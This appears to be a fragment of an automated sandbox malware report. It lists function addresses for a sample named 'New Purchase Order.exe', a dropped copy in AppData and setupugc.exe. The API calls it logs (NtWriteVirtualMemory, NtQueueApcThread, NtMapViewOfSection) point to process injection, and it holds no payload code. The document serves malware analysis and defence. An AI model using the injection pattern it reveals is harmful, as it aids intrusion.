            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932EE0 NtQueueApcThread,LdrInitializeThunk,17_2_03932EE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932DD0 NtDelayExecution,LdrInitializeThunk,17_2_03932DD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932DF0 NtQuerySystemInformation,LdrInitializeThunk,17_2_03932DF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932D10 NtMapViewOfSection,LdrInitializeThunk,17_2_03932D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932D30 NtUnmapViewOfSection,LdrInitializeThunk,17_2_03932D30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932CA0 NtQueryInformationToken,LdrInitializeThunk,17_2_03932CA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932C70 NtFreeVirtualMemory,LdrInitializeThunk,17_2_03932C70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932C60 NtCreateKey,LdrInitializeThunk,17_2_03932C60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039335C0 NtCreateMutant,LdrInitializeThunk,17_2_039335C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039339B0 NtGetContextThread,LdrInitializeThunk,17_2_039339B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932B80 NtQueryInformationFile,17_2_03932B80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932AB0 NtWaitForSingleObject,17_2_03932AB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932F90 NtProtectVirtualMemory,17_2_03932F90
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932FA0 NtQuerySection,17_2_03932FA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932F60 NtCreateProcessEx,17_2_03932F60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932EA0 NtAdjustPrivilegesToken,17_2_03932EA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932E30 NtWriteVirtualMemory,17_2_03932E30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932DB0 NtEnumerateKey,17_2_03932DB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932D00 NtSetInformationFile,17_2_03932D00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932CC0 NtQueryVirtualMemory,17_2_03932CC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932CF0 NtOpenProcess,17_2_03932CF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932C00 NtQueryInformationProcess,17_2_03932C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03933090 NtSetValueKey,17_2_03933090
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03933010 NtOpenDirectoryObject,17_2_03933010
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03933D10 NtOpenProcessToken,17_2_03933D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03933D70 NtOpenThread,17_2_03933D70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E78FD0 NtCreateFile,17_2_02E78FD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E792D0 NtClose,17_2_02E792D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E79230 NtDeleteFile,17_2_02E79230
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E79140 NtReadFile,17_2_02E79140
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E79430 NtAllocateVirtualMemory,17_2_02E79430
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00C8D5BC0_2_00C8D5BC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_02A2B7300_2_02A2B730
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_02A277070_2_02A27707
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_02A277180_2_02A27718
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F4D4940_2_06F4D494
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F4B4700_2_06F4B470
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F476300_2_06F47630
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F4761F0_2_06F4761F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F455500_2_06F45550
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F451180_2_06F45118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F451080_2_06F45108
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F46D580_2_06F46D58
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F47B400_2_06F47B40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F47B300_2_06F47B30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004019D38_2_004019D3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004185938_2_00418593
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004030508_2_00403050
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004100638_2_00410063
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040E0E38_2_0040E0E3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0042EB938_2_0042EB93
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004184D88_2_004184D8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004024B08_2_004024B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040FE438_2_0040FE43
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040FE3B8_2_0040FE3B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0041677E8_2_0041677E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004167838_2_00416783
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DA1188_2_011DA118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011301008_2_01130100
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C81588_2_011C8158
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012001AA8_2_012001AA
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F41A28_2_011F41A2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F81CC8_2_011F81CC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D20008_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FA3528_2_011FA352
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012003E68_2_012003E6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E3F08_2_0114E3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E02748_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C02C08_2_011C02C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011405358_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012005918_2_01200591
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E44208_2_011E4420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F24468_2_011F2446
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EE4F68_2_011EE4F6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011647508_2_01164750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011407708_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113C7C08_2_0113C7C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115C6E08_2_0115C6E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011569628_2_01156962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0120A9A68_2_0120A9A6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011429A08_2_011429A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114A8408_2_0114A840
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011428408_2_01142840
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011268B88_2_011268B8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E8F08_2_0116E8F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FAB408_2_011FAB40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F6BD78_2_011F6BD7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113EA808_2_0113EA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DCD1F8_2_011DCD1F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114AD008_2_0114AD00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01158DBF8_2_01158DBF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113ADE08_2_0113ADE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140C008_2_01140C00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0CB58_2_011E0CB5
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01130CF28_2_01130CF2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01160F308_2_01160F30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E2F308_2_011E2F30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01182F288_2_01182F28
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B4F408_2_011B4F40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BEFA08_2_011BEFA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01132FC88_2_01132FC8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FEE268_2_011FEE26
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140E598_2_01140E59
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01152E908_2_01152E90
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FCE938_2_011FCE93
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FEEDB8_2_011FEEDB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0120B16B8_2_0120B16B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112F1728_2_0112F172
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0117516C8_2_0117516C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114B1B08_2_0114B1B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EF0CC8_2_011EF0CC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011470C08_2_011470C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F70E98_2_011F70E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FF0E08_2_011FF0E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F132D8_2_011F132D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112D34C8_2_0112D34C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0118739A8_2_0118739A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011452A08_2_011452A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115B2C08_2_0115B2C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115D2F08_2_0115D2F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E12ED8_2_011E12ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F75718_2_011F7571
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DD5B08_2_011DD5B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012095C38_2_012095C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FF43F8_2_011FF43F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011314608_2_01131460
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FF7B08_2_011FF7B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011856308_2_01185630
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F16CC8_2_011F16CC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D59108_2_011D5910
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011499508_2_01149950
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115B9508_2_0115B950
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AD8008_2_011AD800
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011438E08_2_011438E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FFB768_2_011FFB76
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115FB808_2_0115FB80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B5BF08_2_011B5BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0117DBF98_2_0117DBF9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FFA498_2_011FFA49
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F7A468_2_011F7A46
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B3A6C8_2_011B3A6C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DDAAC8_2_011DDAAC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01185AA08_2_01185AA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E1AA38_2_011E1AA3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EDAC68_2_011EDAC6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F1D5A8_2_011F1D5A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01143D408_2_01143D40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F7D738_2_011F7D73
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115FDC08_2_0115FDC0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B9C328_2_011B9C32
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FFCF28_2_011FFCF2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FFF098_2_011FFF09
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01141F928_2_01141F92
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FFFB18_2_011FFFB1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01103FD28_2_01103FD2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01103FD58_2_01103FD5
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01149EB08_2_01149EB0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_0312D5BC9_2_0312D5BC
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07ABC7AC9_2_07ABC7AC
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07ABA7289_2_07ABA728
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07ABA7189_2_07ABA718
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB76309_2_07AB7630
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB761F9_2_07AB761F
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB55509_2_07AB5550
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB51089_2_07AB5108
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB51189_2_07AB5118
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB6D589_2_07AB6D58
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB7B309_2_07AB7B30
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 9_2_07AB7B409_2_07AB7B40
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0149010014_2_01490100
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014E600014_2_014E6000
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_015202C014_2_015202C0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A053514_2_014A0535
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014C475014_2_014C4750
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A077014_2_014A0770
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0149C7C014_2_0149C7C0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BC6E014_2_014BC6E0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014B696214_2_014B6962
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A29A014_2_014A29A0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014AA84014_2_014AA840
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A284014_2_014A2840
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014CE8F014_2_014CE8F0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014D889014_2_014D8890
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014868B814_2_014868B8
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0149EA8014_2_0149EA80
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014AED7A14_2_014AED7A
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014AAD0014_2_014AAD00
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A8DC014_2_014A8DC0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0149ADE014_2_0149ADE0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014B8DBF14_2_014B8DBF
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A0C0014_2_014A0C00
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01490CF214_2_01490CF2
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01514F4014_2_01514F40
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014E2F2814_2_014E2F28
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014C0F3014_2_014C0F30
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01492FC814_2_01492FC8
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0151EFA014_2_0151EFA0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A0E5914_2_014A0E59
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014B2E9014_2_014B2E90
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014D516C14_2_014D516C
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0148F17214_2_0148F172
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014AB1B014_2_014AB1B0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0148D34C14_2_0148D34C
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A33F314_2_014A33F3
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BB2C014_2_014BB2C0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BD2F014_2_014BD2F0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A52A014_2_014A52A0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0149146014_2_01491460
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014E74E014_2_014E74E0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A349714_2_014A3497
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014AB73014_2_014AB730
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A995014_2_014A9950
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BB95014_2_014BB950
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A599014_2_014A5990
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0150D80014_2_0150D800
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A38E014_2_014A38E0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01515BF014_2_01515BF0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014DDBF914_2_014DDBF9
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BFB8014_2_014BFB80
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01513A6C14_2_01513A6C
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A3D4014_2_014A3D40
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014BFDC014_2_014BFDC0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_01519C3214_2_01519C32
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014B9C2014_2_014B9C20
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A1F9214_2_014A1F92
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_014A9EB014_2_014A9EB0
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: 14_2_0042EB9314_2_0042EB93
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0390E3F017_2_0390E3F0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039C03E617_2_039C03E6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BA35217_2_039BA352
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039802C017_2_039802C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039A027417_2_039A0274
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039C01AA17_2_039C01AA
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B41A217_2_039B41A2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B81CC17_2_039B81CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0399A11817_2_0399A118
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038F010017_2_038F0100
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0398815817_2_03988158
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0399200017_2_03992000
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038FC7C017_2_038FC7C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0392475017_2_03924750
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0390077017_2_03900770
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0391C6E017_2_0391C6E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039C059117_2_039C0591
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0390053517_2_03900535
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039AE4F617_2_039AE4F6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039A442017_2_039A4420
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B244617_2_039B2446
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B6BD717_2_039B6BD7
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BAB4017_2_039BAB40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038FEA8017_2_038FEA80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039029A017_2_039029A0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039CA9A617_2_039CA9A6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0391696217_2_03916962
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038E68B817_2_038E68B8
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0392E8F017_2_0392E8F0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0390A84017_2_0390A840
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0390284017_2_03902840
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0397EFA017_2_0397EFA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038F2FC817_2_038F2FC8
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03920F3017_2_03920F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039A2F3017_2_039A2F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03942F2817_2_03942F28
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03974F4017_2_03974F40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03912E9017_2_03912E90
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BCE9317_2_039BCE93
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BEEDB17_2_039BEEDB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BEE2617_2_039BEE26
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03900E5917_2_03900E59
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03918DBF17_2_03918DBF
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038FADE017_2_038FADE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0399CD1F17_2_0399CD1F
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0390AD0017_2_0390AD00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039A0CB517_2_039A0CB5
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038F0CF217_2_038F0CF2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03900C0017_2_03900C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0394739A17_2_0394739A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B132D17_2_039B132D
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038ED34C17_2_038ED34C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039052A017_2_039052A0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0391B2C017_2_0391B2C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0391D2F017_2_0391D2F0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039A12ED17_2_039A12ED
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0390B1B017_2_0390B1B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039CB16B17_2_039CB16B
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038EF17217_2_038EF172
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0393516C17_2_0393516C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039070C017_2_039070C0
